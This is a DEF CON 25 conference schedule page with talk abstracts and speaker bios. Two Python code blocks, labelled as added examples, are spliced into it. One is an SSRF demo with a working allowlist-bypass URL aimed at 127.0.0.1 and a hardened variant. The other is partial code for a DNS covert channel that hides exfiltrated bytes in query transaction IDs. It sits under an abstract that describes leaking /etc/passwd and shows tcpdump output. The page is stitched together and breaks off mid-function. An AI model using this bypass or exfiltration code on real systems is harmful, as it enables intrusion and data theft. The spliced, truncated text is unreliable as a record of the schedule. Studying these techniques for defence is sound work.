Yuwei Zheng is a senior security researcher in the Radio Security Research Dept. of 360 Technology. He has over 10 years of experience in embedded systems. He reversed the BlackBerry BBM, PIN and BIS push mail protocols and successfully decrypted the network stream in 2011. He successfully implemented a MITM attack against BlackBerry BES based on RIM's modified ECMQV protocol. He focuses on the security issues of embedded hardware and IoT systems. He has spoken at DEF CON, HITB, etc.

Lin Huang
Lin Huang is a wireless security researcher and SDR technology expert in the Radio Security Research Dept. of 360 Technology. Her interests include security issues in wireless communication, especially cellular network security. She has spoken at security conferences including DEF CON, HITB, POC, etc. She is the 3GPP SA3 delegate of 360 Technology.

@huanglin_bupt


Contributor Acknowledgement:

The speakers would like to acknowledge Qing YANG for his contribution to the presentation. Qing YANG is the founder of UnicornTeam and of the Radio Security Research Department in 360 Technology. He has rich experience in the information security area. He has presented at BlackHat, DEF CON, CanSecWest, HITB, Ruxcon, POC, XCon, China ISC, etc.


Return to Index      -     

 

DEFCON - Track 1 - Sunday - 15:00-15:45


25 Years of Program Analysis

Sunday at 15:00 in 101 Track

45 minutes | Hacker History, Demo

Zardus (Yan Shoshitaishvili) Assistant Professor, Arizona State University

Last year, DARPA hosted the Cyber Grand Challenge, the culmination of humanity's research into autonomous detection, exploitation, and mitigation of software vulnerabilities. Imagine the CGC from the outside: huge racks of servers battling it out on stage, throwing exploit after exploit at each other while humans watch helplessly from the sidelines. But that vantage point misses the program analysis methods used, the subtle trade-offs made, and the actual capabilities of these systems. It also misses why, outside of the controlled CGC environment, most automated techniques don't quite scale to the analysis of real-world software!

This talk will provide a better perspective. On the 25th anniversary of DEFCON, we will go through these last 25 years of program analysis. We'll learn about the different disciplines of program analysis (and learn strange terms such as static, dynamic, symbolic, and abstract), understand the strengths and drawbacks of each, and see if, and to what extent, they are used in the course of actual vulnerability analysis.

Did you know that every finalist system in the Cyber Grand Challenge used a combination of dynamic analysis and symbolic execution to find vulnerabilities, but used static analysis to patch them? Why is that? Did you know that, to make the contest feasible for modern program analysis techniques, the CGC enforced a drastically-simplified OS model? What does this mean for you, if you want to use program analysis while finding vulns and collecting bug bounties? Come to this talk, become an expert, and go on to contribute to the future of program analysis!

Zardus (Yan Shoshitaishvili)
Zardus is one of the hacking aces on Shellphish, the oldest-running CTF team in the world. He's been attending DEFCON since 2001, playing DEFCON CTF since 2009, and talking at DEFCON since 2015. Through this time, he also pursued a PhD in Computer Security, focusing on Program Analysis. The application of cutting-edge academic program analysis techniques to CTF (and, later, to his participation in the DARPA Cyber Grand Challenge, where he led Shellphish to a 3rd-place victory and a big prize payout) gave Zardus a unique understanding of the actual capabilities of the state of the art of program analysis, which in turn drove his research and culminated in the release of the angr binary analysis framework and the Mechanical Phish, one of the world's first autonomous Cyber Reasoning Systems.



 

DEFCON - Track 2 - Sunday - 12:00-12:45


Are all BSDs created equally? A survey of BSD kernel vulnerabilities.

Sunday at 12:00 in Track 2

45 minutes | Demo

Ilja van Sprundel Director of penetration testing, IOActive

In this presentation I start off asking the question "How come there are only a handful of BSD kernel security bug advisories released every year?" and then proceed to look at some data from several sources. It should come as no surprise that those sources are fairly limited and somewhat outdated.

The presentation then moves on to collecting some data myself. This is done by actively investigating and auditing: code review, fuzzing and runtime testing on all 3 major BSD distributions (NetBSD, OpenBSD, FreeBSD). This starts by investigating where the bugs are likely to be. Once determined, a detailed review is performed of those places. Samples and demos will be shown.

I end the presentation with some results and conclusions. I will list the outcome in terms of bugs found, and which of the 3 main BSD distributions can, based on the data I now have, be seen as the clear winner and loser. I will go into detail about the code quality observed and give some pointers on how to improve some code. Lastly I will try to answer the question I set out to answer ("How come there are only a handful of BSD kernel security bug advisories released every year?").

Ilja van Sprundel
Ilja van Sprundel is experienced in exploit development and network and application testing. As IOActive's Director of Penetration Testing, he performs primarily gray-box penetration testing engagements on mobile (specializing in iOS) and runtime (specializing in Windows kernel) applications that require customized fuzzing and source code review, identifying system vulnerabilities and designing custom security solutions for clients in technology development, telecommunications, and financial services. van Sprundel specializes in the assessment of low-level kernel code and architecture/infrastructure design, having security-reviewed literally hundreds of thousands of lines of code. However, as a Director, he also functions in a managerial capacity by overseeing penetration testing engagements, providing oversight regarding technical accuracy, serving as the point of contact between technical consultants and technical stakeholders, and ensuring that engagements are delivered on time and in alignment with customers' expectations. van Sprundel is also responsible for mentoring and guiding Associate-level consultants as they grow both their penetration testing and general consulting skillsets. He is the driver behind the team's implementation of cutting-edge techniques and tools, guided by both research and successful exploits performed during client engagements.



 

PHV - Milano VIII - Promenade Level - Saturday - 15:10-15:59


Modern Day CovertTCP with a Twist

Mike Raggo, CSO at 802 Secure, Inc.
Chet Hosmer, Owner of python-forensics.org

Taking a modern-day look on the 20-year anniversary of Craig Rowland's article on Covert TCP, we explore current-day methods of covert communications and demonstrate that we are not much better off at stopping these exploits than we were 20 years ago. With the explosion of networked devices using a plethora of new wired and wireless protocols, the covert communication exploit surface is paving new paths for covert data exfiltration and secret communications. In this session, we will explore UPnP, Zigbee, WiFi, P25, streaming audio services, IoT, and much more. Through real-world examples, sample code, and demos, we bring to light this hidden world of concealed communications.

Mike Raggo (Twitter: @MikeRaggo) Chief Security Officer, 802 Secure (CISSP, NSA-IAM, ACE, CSI) has over 20 years of security research experience. His current focus is wireless IoT threats impacting the enterprise. Michael is the author of “Mobile Data Loss: Threats and Countermeasures” and “Data Hiding: Exposing Concealed Data in Multimedia, Operating Systems, Mobile Devices and Network Protocols” for Syngress Books, and contributing author for “Information Security the Complete Reference 2nd Edition”. A former security trainer, Michael has briefed international defense agencies including the FBI and Pentagon, is a participating member of FSISAC/BITS and PCI, and is a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, HackCon, and SANS.

Chet Hosmer (Twitter: @ChetHosmer) is the Founder of Python Forensics, Inc., a non-profit organization focused on the collaborative development of open-source investigative technologies using the Python programming language. Chet is also the founder of WetStone Technologies, Inc. and has been researching and developing technology and training surrounding forensics, digital investigation and steganography for over two decades. He has made numerous appearances to discuss emerging cyber threats, including National Public Radio's Kojo Nnamdi show, ABC's Primetime Thursday, NHK Japan, TechTV's CyberCrime and ABC News Australia. He has also been a frequent contributor to technical and news stories relating to cyber security and forensics and has been interviewed and quoted by IEEE, The New York Times, The Washington Post, Government Computer News, Salon.com and Wired Magazine. He is the author of three recent Elsevier/Syngress Books: Python Passive Network Mapping, Python Forensics, and Data Hiding. Chet serves as a visiting professor at Utica College, where he teaches in the Cybersecurity Graduate program. He is also an Adjunct Faculty member at Champlain College in the Master of Science in Digital Forensic Science program. Chet delivers keynote and plenary talks on various cyber security related topics around the world each year.



Night Life - Chillout Lounge, Roman 3, Promenade Level - Friday - 18:00-20:00


Title:
"DCG" Mixer

Come meet the DEF CON Groups organizers after their talk (17:00 - 17:45 in Track 2) on Friday. This DEF CON Groups mixer is for all who are, or want to become, members of local DEF CON Groups. Come to get info, meet peers, and get some DCG swag. There will be a limited amount of free beer via kegs courtesy of The Dark Tangent. Join us Friday evening to meet fellow DCG organizers and members from all over the world. Tell us what makes your group work, or doesn't, or just raise a glass with like-minded hackers. See you there!

DEFCON - Track 4 - Friday - 16:00-16:45


"Tick, Tick, Tick. Boom! You're Dead." — Tech & the FTC

Friday at 16:00 in Track 4

45 minutes

Whitney Merrill Privacy, eCommerce & Consumer Protection Counsel, Electronic Arts

Terrell McSweeny Commissioner, Federal Trade Commission

The Federal Trade Commission is a law enforcement agency tasked with protecting consumers from unfair and deceptive practices. Protecting consumers on the Internet and from bad tech is nothing new for the FTC. We will take a look back at what the FTC was doing when DEF CON first began in 1993, and what we've been doing since. We will discuss enforcement actions involving modem hijacking, FUD advertising, identity theft, and even introduce you to Dewie the e-Turtle. Looking forward, we will talk about the FTC's future protecting consumers' privacy and data security and what you can do to help.

Whitney Merrill
Whitney Merrill is a hacker, ex-fed, and lawyer. She's currently a privacy attorney at Electronic Arts (EA), and in her spare time, she runs the Crypto & Privacy Village (come say hi!). Recently, she served her country as an attorney at the Federal Trade Commission where she worked on a variety of consumer protection matters including data security, privacy, and deceptive marketing and advertising. Whitney received her J.D. and master's degree in Computer Science from the University of Illinois at Urbana-Champaign.

@wbm312

Terrell McSweeny
Terrell McSweeny serves as a Commissioner of the Federal Trade Commission. This year marks her fourth time at DEF CON. When it comes to tech issues, Commissioner McSweeny has focused on the valuable role researchers and hackers can play protecting consumer data security and privacy. She opposes bad policy and legislative proposals like mandatory backdoors and the criminalization of hacking and believes that enforcers like the FTC should work with the researcher community to protect consumers. She wants companies to implement security by design, privacy by design and data ethics by design, but recognizes that, in the absence of regulation, enforcement and research are the only means of holding companies accountable for the choices they make in the ways that they hold and use consumer data.

@TMcSweenyFTC



DEFCON - Track 4 - Saturday - 10:20-10:40


(Un)Fucking Forensics: Active/Passive (i.e. Offensive/Defensive) memory hacking/debugging.

Saturday at 10:20 in Track 4

20 minutes | Hacker History, Art of Defense, Demo, Tool

K2 Director, IOACTIVE

How to forensic, how to fuck forensics and how to un-fuck cyber forensics.

Defense: WTF is a RoP, why I care and how to detect it statically from memory. Counteract "Gargoyle" attacks.

Defense: For one of DEF CON 24's more popular anti-forensics talks (see int0x80 - Anti Forensics). In-memory (passive debugging) techniques that allow for covert debugging of attackers (active passive means that we will (try hard to) not use events or methods whose facilities are detectable by attackers).

Offense: CloudLeech - a cloud twist on Ulf Frisk's Direct Memory Attack

K2
K2 (w00w00, ADM, undernet, efnet, The Honeynet Project) is a devil-in-the-details person who does not take themselves too seriously and appreciates a good laugh. Earlier DEF CON presentations included polymorphic shellcode in the form of ADMMutate (see ADM Crew), low-level process detection with page table analysis (Weird-Machine motivated shellcode), and using the branch tracing store backdoor trick on Windows to counter ransomware, detect ROP (runtime + HW assisted) and draw cool graphs ("BlockFighting with a Hooker: BlockFighter2!"). All three of these are open source tools available at github.com/K2 (EhTrace and inVtero.Net are under active development).

@ktwo_K2
GitHub: https://github.com/K2



DEFCON - Track 2 - Saturday - 10:00-10:45


$BIGNUM steps forward, $TRUMPNUM steps back: how can we tell if we're winning?

Saturday at 10:00 in Track 2

45 minutes

Cory Doctorow craphound.com, science fiction author, activist, journalist and blogger.

Is Net Neutrality on the up or down? Is DRM rising or falling? Is crypto being banned, or will it win, and if it does, will its major application be ransomware or revolution? Is the arc of history bending toward justice, or snapping abruptly and plummeting toward barbarism?

It's complicated.

A better world isn't a product, it's a process. The right question isn't, "Does the internet make us better or worse," it's: "HOW DO WE MAKE AN INTERNET THAT MAKES THE WORLD BETTER?" We make the world better with code, sure, but also with conversations, with businesses, with lawsuits and with laws.

We don't know how to get to a better world, but we know which direction it's in, and we know how to hill-climb towards it. If we keep heading that way, we'll get *somewhere*. Somewhere good. Somewhere imperfect. Somewhere where improvement is possible.

Cory Doctorow
Cory Doctorow (craphound.com) is a science fiction author, activist, journalist and blogger - the co-editor of Boing Boing (boingboing.net) and the author of WALKAWAY, a novel for adults, a YA graphic novel called IN REAL LIFE, the nonfiction business book INFORMATION DOESN'T WANT TO BE FREE, and young adult novels like HOMELAND, PIRATE CINEMA and LITTLE BROTHER and novels for adults like RAPTURE OF THE NERDS and MAKERS. He works for the Electronic Frontier Foundation, is an MIT Media Lab Research Affiliate, is a Visiting Professor of Computer Science at Open University and co-founded the UK Open Rights Group. Born in Toronto, Canada, he now lives in Los Angeles.

@doctorow



IOT - Main Contest Area - Friday - 17:40-18:30




Night Life - Promenade level, in Skytalks room. - Friday - 22:30-27:00


Title:
303 Party

Hosted and produced by the hacker collective simply known as 303. This event needs no introduction...really. See you there!

Workshops - ( Sold Out ) - Octavius 1 - Thursday - 10:30-14:30


A B C of Hunting

Thursday, 10:30 to 14:30 in Octavius 1

Julian Dana Mandiant / FireEye

We heard it all before. The old-school SOC/CIRT is not enough to fight the sophisticated attacks we see these days; being reactive to alerts and the known-BAD model is not cutting it anymore. We need to move forward -> the CDC (Cyber Security Center) or the SOC/CIRT 2.0+, extra, super, plus! And that means making the changes to become: Proactive, Predictive and Reactive too. And for that you need to start the HUNTING! .... BUT what is that? How do I do it? Where do I start? Which is the simplest for me as an analyst? Logs? Intelligence?

Let's start from the ABC... We will cover the theory and a few practical LABs. How to map active Hunting to the Attack Lifecycle. We will talk about IOCs and Frequency Analysis (stacking). Intel-driven LAB. And lastly we ask you to use your imagination to create your own Hunting case.

Please get ready to talk, as it is going to be interactive (I'm not expecting to be the only one talking).

Prerequisites: Basic Incident Response knowledge. Basic security architecture knowledge. Basic log review knowledge. Basic OS knowledge.

Materials: The attendees should bring a laptop or a VM running Windows 7 or above with 2GB of RAM (4+ GB would be better) with connection to the Internet (the one provided by DEF CON works perfectly). Software: Spreadsheet editor, favorite text editor or log viewer. Admin rights to be able to install software if required.

Max students: 36 | Registration: https://dc25_dana.eventbrite.com (Sold out!)

Julian Dana
Julian is a Professional Services Director at Mandiant (a FireEye company). He has experience teaching IR, Network Investigations and other trainings. During his career, he has developed SOC/CIRTs, performed many penetration tests, responded to security breaches and worked on strategic security engagements for international companies and government institutions.



DEFCON - Track 3 - Friday - 12:00-12:45


A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!

Friday at 12:00 in Track 3

45 minutes | Demo, Tool, Exploit

Orange Tsai Security Consultant from DEVCORE

We propose a new exploit technique that brings a whole new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.

Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.

Understanding the basics of this technique, the audience won't be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.
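The root cause named in the abstract, an SSRF check and the HTTP client parsing the same URL differently, is easy to reproduce in a few lines. The following is an added illustration, not the talk's code and not any of the 0days it reports: the allowlist check runs on Python's RFC 3986-style urllib.parse, while the "requester" is a constructed stand-in for an HTTP library that ends the authority at a backslash the way browsers do. The hardened function beneath it is one way to close the gap. The allowlist, hostnames and the injected resolver are assumed values so the script runs offline.

```python
"""SSRF filter bypass from parser disagreement, added example (not the talk's code
and none of its reported 0-days). The validator uses Python's RFC 3986-style
urllib.parse; the 'requester' parser is a constructed stand-in for an HTTP library
that treats a backslash like a slash (browser/WHATWG behaviour). ALLOWED_HOSTS and
the hostnames are assumed values."""
import ipaddress
import re
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"images.example.com"}  # assumed allowlist of fetchable hosts


def validator_host(url):
    """What the SSRF check sees: urlsplit ends the authority at the first '/', '?'
    or '#', and takes the text after the LAST '@' as the host."""
    return urlsplit(url).hostname


def requester_host(url):
    """What the HTTP client connects to (constructed parser): the authority also
    ends at a backslash, so an '@' after the backslash is never seen as userinfo."""
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/\\?#]*)", url, re.I)
    authority = m.group(1) if m else ""
    return authority.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def vulnerable_fetch_target(url):
    """Allowlist check done on one parser, connection decided by another."""
    if validator_host(url) not in ALLOWED_HOSTS:
        raise ValueError("blocked by SSRF filter")
    return requester_host(url)  # the host actually contacted


STRICT_AUTHORITY = re.compile(r"^(?P<host>[a-z0-9.-]+)(?::(?P<port>\d{1,5}))?$", re.I)


def hardened_fetch_target(url, resolve):
    """Hardened version: parse once, accept only a plain host[:port] authority (no
    userinfo, no backslash, no IPv6 brackets), check the allowlist, resolve the name
    and reject non-public addresses, then hand the client a URL rebuilt from the
    validated parts. `resolve` is an injected hostname->IP function so this runs
    offline; in production it would be a real lookup."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    m = STRICT_AUTHORITY.match(parts.netloc)
    if not m:
        raise ValueError("authority must be host[:port]")
    host = m.group("host").lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError("host not in allowlist")
    ip = ipaddress.ip_address(resolve(host))
    if not ip.is_global:
        raise ValueError("resolves to a non-public address")
    netloc = host + (":" + m.group("port") if m.group("port") else "")
    canonical = urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))
    # Caveat: a second lookup at connect time reopens a DNS-rebinding window;
    # connect to `ip` directly and send `host` in the Host header.
    return canonical, str(ip)


if __name__ == "__main__":
    bypass = "http://127.0.0.1\\@images.example.com/"
    print("validator sees:", validator_host(bypass), "| requester contacts:", requester_host(bypass))
    print("vulnerable path fetches from:", vulnerable_fetch_target(bypass))
    try:
        hardened_fetch_target(bypass, lambda h: "1.2.3.4")
    except ValueError as e:
        print("hardened path:", e)
```

The hardened path does not try to out-parse the client: it rejects any authority that is not a bare host[:port], so every input the two parsers could disagree on is refused before a request is built, and the client only ever receives a string reassembled from the validated pieces.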

Orange Tsai
Cheng-Da Tsai, also known as Orange Tsai, is a member of DEVCORE and CHROOT from Taiwan. He has spoken at conferences such as HITCON, WooYun and AVTokyo. He participates in numerous Capture-the-Flag (CTF) competitions, and won 2nd place at DEF CON 22 as a member of team HITCON.

Currently focusing on vulnerability research and web application security, Orange enjoys finding vulnerabilities and participates in bug bounty programs. He is enthusiastic about Remote Code Execution (RCE), and has uncovered RCE at several vendors, such as Facebook, Uber, Apple, GitHub, Yahoo and Imgur.



CPV - Florentine Ballroom 4 - Friday - 15:00-16:00


Title:
A New Political Era: Time to start wearing tin-foil hats following the 2016 elections?

Author:
Joel Wallenstrom
Robby Mook

Abstract:
The most trivial communications were weaponized and drastically changed the course of the 2016 elections right before our eyes. As a result, information security is now a number one priority for all political campaigns domestic and international. Yet many in the political community, including France, the UK, and the US, are deploying the same old practices, tools, and user training for communicating highly-sensitive information. In addition to continuing to hoard high-target data, political parties and candidates are reluctant to change behaviors and ask for help. Admitting to being hacked has become increasingly stigmatized, preventing under-resourced campaigns and the policy community from understanding how to deal with persistent and well-funded adversaries.

What have we learned and how likely is it that this will happen to election campaigns again? This talk will provide a first-hand context for understanding the exact political, media and security environments in which multiple breaches were detected on the Democratic side of the 2016 campaign and how they went unmitigated for months. The talk will then trace how, in the aftermath, the affected parties have attempted, successfully or not, to recover and learn to work with the infosec community. We will also touch on what impact product decisions in the tech and security space have on ordinary users' ability to do their work, including running national campaigns. Finally, the talk will touch on ephemerality becoming the number one behavioral change the victims of the election hacking seek as an antidote to information weaponization.

Bio:
Joel Wallenstrom is the CEO of Wickr, a secure communications company building peer-to-peer encrypted ephemeral messaging and collaboration platforms. Prior to joining Wickr, Joel co-founded and led several top white-hat hacker teams including iSEC Partners and NCC Group, renowned for their cutting edge independent security research and incident response in high-profile cases. Joel also served as Director for Strategic Alliances at @stake.

Robby Mook is a former campaign manager for a $1 billion start-up called HFACC, Inc., more commonly known as Hillary for America. Robby successfully ran the Virginia gubernatorial campaign for Terry McAuliffe, served as an organizer for Barack Obama's 2008 team in Nevada, Indiana, and Ohio while working for Hillary Clinton's first campaign and leading the Democratic Congressional Campaign Committee.
Twitter handle of presenter(s): @RobbyMook @mywickr
Website of presenter(s) or content: wickr.com


DEFCON - Track 4 - Saturday - 13:00-13:45


A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego

Saturday at 13:00 in Track 4

45 minutes | Tool

Philip Tully Principal Data Scientist, ZeroFOX

Michael T. Raggo Chief Security Officer, 802 Secure

Images, videos and other digital media provide a convenient and expressive way to communicate through social networks. But such broadcastable and information-rich content provides ample illicit opportunity as well. Web-prevalent image files like JPEGs can be disguised with foreign data since they're perceivably robust to minor pixel and metadata alterations. Slipping a covert message into one of the billions of daily posted images may be possible, but to what extent can steganography be systematically automated and scaled?

To explore this, we first report the distorting side effects rendered upon images uploaded to popular social network servers, e.g. compression, resizing, format conversion, and metadata stripping. Then, we build a convolutional neural network that learns to reverse engineer these transformations by optimizing hidden data throughput capacity. From pre-uploaded and downloaded image files, the network learns to locate candidate metadata and pixels that are least modifiable during transit, allowing stored hidden payloads to be reliably recalled from newly presented images. Deep learning typically requires tons of training data to avoid overfitting. But data acquisition is trivial using social networks' free image hosting services, which feature bulk uploads and downloads of thousands of images at a time per album.

We show that hidden data can be predictably transmitted through social network images with high fidelity. Our results demonstrate that AI can hide data in plain sight, at large-scale, beyond human visual discernment, and despite third-party manipulation. Steganalysis and other defensive forensic countermeasures are notoriously difficult, and our exfiltration techniques highlight the growing threat posed by automated, AI-powered red teaming.

Philip Tully
Philip Tully is a Principal Data Scientist at ZeroFOX. He employs natural language processing and computer vision techniques in order to develop predictive models for combating security threats emanating from social networks. He earned his joint doctorate degree in computer science from the Royal Institute of Technology (KTH) and the University of Edinburgh, and has spoken at Black Hat, DEF CON, ShowMeCon and across the neuroscience conference circuit. He's a hackademic that's interested in applying brain-inspired algorithms to both blue and red team operations.

@phtully

Michael T. Raggo
Michael T. Raggo, Chief Security Officer, 802 Secure (CISSP, NSA-IAM, CSI) has over 20 years of security research experience. His current focus is wireless IoT threats impacting the enterprise. Michael is the author of "Mobile Data Loss: Threats & Countermeasures" and "Data Hiding: Exposing Concealed Data in Multimedia, Operating Systems, Mobile Devices and Network Protocols" for Syngress Books, and contributing author for "Information Security the Complete Reference 2nd Edition". A former security trainer, Michael has briefed international defense agencies including the FBI and Pentagon, is a participating member of FSISAC/BITS and PCI, and is a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, HackCon, and SANS.



Wireless - Florentine BR I & II - Promenade Level - Saturday - 18:00-18:25


Darren Kitchen

Bio

Darren Kitchen is the founder of Hak5, the award winning Internet television show inspiring hackers and enthusiasts since 2005. Breaking out of the 90s phone phreak scene, he has continued contributing to the hacker community as a speaker, instructor, author and developer of leading penetration testing tools.

@hak5darren

Sebastian Kinne

Bio

Sebastian Kinne has led software development at Hak5 since 2011. His background in embedded systems and reverse engineering has been instrumental in the success of the WiFi Pineapple, the popular WiFi auditing tool. As an instructor and speaker on WiFi security, chances are he's sniffed your packets in a demo or two.

@sebkinne

A Pineapple, a Turtle, a Bunny, and a Squirrel walk into a bar

Abstract

A Pineapple, a Turtle, a Bunny and a Squirrel walk into a bar. Seriously. It has been a big year for the fruity team behind the WiFi Pineapple. No, that doesn't sound right. It's been a big year for Hak5. We've been working on new wireless initiatives, some out-of-band covert channel goodness, and something called a squirrel. One might say we're nuts. Join Darren Kitchen and Sebastian Kinne of famed pentesting tools and get a peek into what's right around the corner.



SEV - Emperors BR II - Saturday - 17:30-18:20



Saturday July 29 5:30PM 50 mins
...Not lose the common touch
Building rapport is essential in life, and critical in Social Engineering. A lesson learned while tending bar on the Las Vegas Strip taught me something that everyone has in common: Everybody is from somewhere. Find out how to use this idea on engagements and in everyday life.

Billy Boatright: @fuzzy_l0gic
Billy began his social engineering career without even knowing it. He was a bartender on the Las Vegas Strip for the better part of a decade. He won numerous awards from all over the world as a top-ranked Flair Bartender. He has taken the skills he learned behind the bar to the Information Security world. Billy has been a Judge for the Social Engineering Capture the Flag event at DEF CON. He is also the namesake for the BSides Las Vegas Social Engineering Capture the Flag Championship Belt. Billy also volunteers time and expertise to the Las Vegas ISSA Chapter as a Board Member. He is also a member of the BSides Las Vegas Senior Staff.

Billy has multiple degrees and numerous certifications. However, when asked about them he will gladly quote George Moriarty, "The shining trophies on our shelves can never win tomorrow's game."



DEFCON - Track 4 - Friday - 15:00-15:45


Abusing Certificate Transparency Logs

Friday at 15:00 in Track 4

45 minutes | Demo, Tool

Hanno Böck Hacker and freelance journalist

The Certificate Transparency system provides public logs of TLS certificates. While Certificate Transparency is primarily used to uncover security issues in certificates, its data is also valuable for other use cases. The talk will present a novel way of exploiting common web applications like WordPress, Joomla or Typo3 with the help of Certificate Transparency.

Certificate Transparency has helped uncover various incidents in the past where certificate authorities have violated rules. It is probably one of the most important security improvements that has ever happened in the certificate authority ecosystem. In September 2017 Google will make Certificate Transparency mandatory for all new certificates. So it's a good time to see how it could be abused by the bad guys.

Hanno Böck
Hanno Böck is a hacker and freelance journalist. He regularly covers IT security issues for the German IT news site Golem.de and publishes the monthly Bulletproof TLS Newsletter. He also runs the Fuzzing Project, an effort to improve the security of free and open source software supported by the Linux Foundation's Core Infrastructure Initiative.

@hanno



CHV - Village Talks Outside Contest Area, Pool Level - Friday - 14:30-15:30


Abusing Smart Cars with QR codes

No description available



DEFCON - Track 1 - Saturday - 11:20-11:40


Abusing Webhooks for Command and Control

Saturday at 11:20 in 101 Track

20 minutes | Demo, Tool

Dimitry Snezhkov Security Consultant, X-Force Red, IBM

You are on the inside of the perimeter. And maybe you want to exfiltrate data, download a tool, or execute commands on your command and control server (C2). Problem is - the first leg of connectivity to your C2 is denied. Your DNS and ICMP traffic is being monitored. Access to your cloud drives is restricted. You've implemented domain fronting for your C2 only to discover it is ranked low by the content proxy, which is only allowing access to a handful of business related websites on the outside.

We have all been there, seeing frustrating proxy denies or triggering security alarms making our presence known.
Having more choices when it comes to outbound network connectivity helps. In this talk we'll present a technique to establish such connectivity with the help of HTTP callbacks (webhooks). We will walk you through what webhooks are, how they are used by organizations. We will then discuss how you can use approved sites as brokers of your communication, perform data transfers, establish almost realtime asynchronous command execution, and even create a command-and-control communication over them, bypassing strict defensive proxies, and even avoiding attribution.

Finally, we'll release the tool that will use the concept of a broker website to work with the external C2 using webhooks.

Dimitry Snezhkov
Dimitry Snezhkov does not like to refer to himself in the third person ;) but when he does he is a Sr. Security Consultant for X-Force Red at IBM, currently focusing on offensive security testing, code hacking and tool building.

@Op_Nomad



SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 14:00-14:59


Title:
Advanced DNS Exfil

1400 Friday
Nolan and Cory

"Our previous demonstration used base64-encoded subdomains to exfiltrate data. It created long subdomains that might look unusual to an analyst and was detectable if you were to look for domains that had very high numbers of unique subdomains.

This method, although slower in throughput, is less detectable by frequency analysis using tools such as the ELK stack. The reason for this is that data is encoded into the DNS header rather than the resource sections of the packet. The query can be the authoritative domain name if exfiltration should need to pass through caches. If the client has direct access to port 53, however, any domain name can be specified as it is totally ignored by the exfiltration process.

In the example above, I am directly querying the evil DNS using common domain names bing.com, yahoo.com and google.com. The evil DNS server responds with the correct A record response, while at the same time reproducing the contents of /etc/passwd.

While that is going on, tcpdump appears to show normal-looking traffic with accurate responses.

19:58:39.298908 IP 127.0.0.1.53 > 127.0.0.1.43371: 25967 2/0/0 A 204.79.197.200, A 13.107.21.200 (58)
19:58:39.299534 IP 127.0.0.1.47467 > 127.0.0.1.53: 25964+ A? bing.com. (26)
19:58:39.300673 IP 10.0.1.39.49825 > 8.8.8.8.53: 25964+ A? bing.com. (26)
19:58:39.321210 IP 8.8.8.8.53 > 10.0.1.39.49825: 25964 2/0/0 A 204.79.197.200, A 13.107.21.200 (58)
19:58:39.321828 IP 127.0.0.1.53 > 127.0.0.1.47467: 25964 2/0/0 A 204.79.197.200, A 13.107.21.200 (58)
19:58:39.322258 IP 127.0.0.1.58465 > 127.0.0.1.53: 25967+ A? yahoo.com. (27)
19:58:39.322991 IP 10.0.1.39.46677 > 8.8.8.8.53: 25967+ A? yahoo.com. (27)
19:58:39.343705 IP 8.8.8.8.53 > 10.0.1.39.46677: 25967 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
19:58:39.344408 IP 127.0.0.1.53 > 127.0.0.1.58465: 25967 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
19:58:39.344872 IP 127.0.0.1.55726 > 127.0.0.1.53: 25959+ A? yahoo.com. (27)
19:58:39.345549 IP 10.0.1.39.39783 > 8.8.8.8.53: 25959+ A? yahoo.com. (27)
19:58:39.393440 IP 8.8.8.8.53 > 10.0.1.39.39783: 25959 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
19:58:39.394173 IP 127.0.0.1.53 > 127.0.0.1.55726: 25959 3/0/0 A 98.139.183.24, A 98.138.253.109, A 206.190.36.45 (75)
19:58:39.394902 IP 127.0.0.1.51405 > 127.0.0.1.53: 25961+ A? google.com. (28)
19:58:39.395784 IP 10.0.1.39.37965 > 8.8.8.8.53: 25961+ A? google.com. (28)
19:58:39.410372 IP 8.8.8.8.53 > 10.0.1.39.37965: 25961 1/0/0 A 172.217.5.110 (44)
19:58:39.411103 IP 127.0.0.1.53 > 127.0.0.1.51405: 25961 1/0/0 A 172.217.5.110 (44)



As far as I know no one has done much DNS Exfil work without the use of subdomains so I believe this is somewhat new."
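The mechanism the quoted abstract describes, data in the DNS header while the QNAME stays a popular domain, is small enough to show end to end. The following is an added example in Python, not the speakers' tool: a sender that packs payload bytes into the 16-bit transaction ID of A queries for bing.com, yahoo.com and google.com; a receiver that pulls the IDs back out of tcpdump-style lines like the ones above; and a detection heuristic for the analyst who cannot count unique subdomains here. The two-bytes-per-query encoding, the constructed capture and the printable-byte heuristic are all assumptions; the page only states that the data lives in the header rather than the resource sections.

```python
"""Covert channel in the DNS header, added example (not the speakers' tool).
Payload bytes ride in the 16-bit transaction ID of ordinary A queries for
popular domains, so the QNAME itself stays boring. The encoding used here
(two big-endian bytes per query, zero padded) is an assumption; the talk
only says the data lives in the header rather than the resource sections."""
import re
import struct

COVER_DOMAINS = ["bing.com", "yahoo.com", "google.com"]  # benign-looking QNAMEs


def encode_qname(name):
    """Wire-format QNAME: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += struct.pack("!B", len(label)) + label.encode("ascii")
    return out + b"\x00"


def build_query(txid, name):
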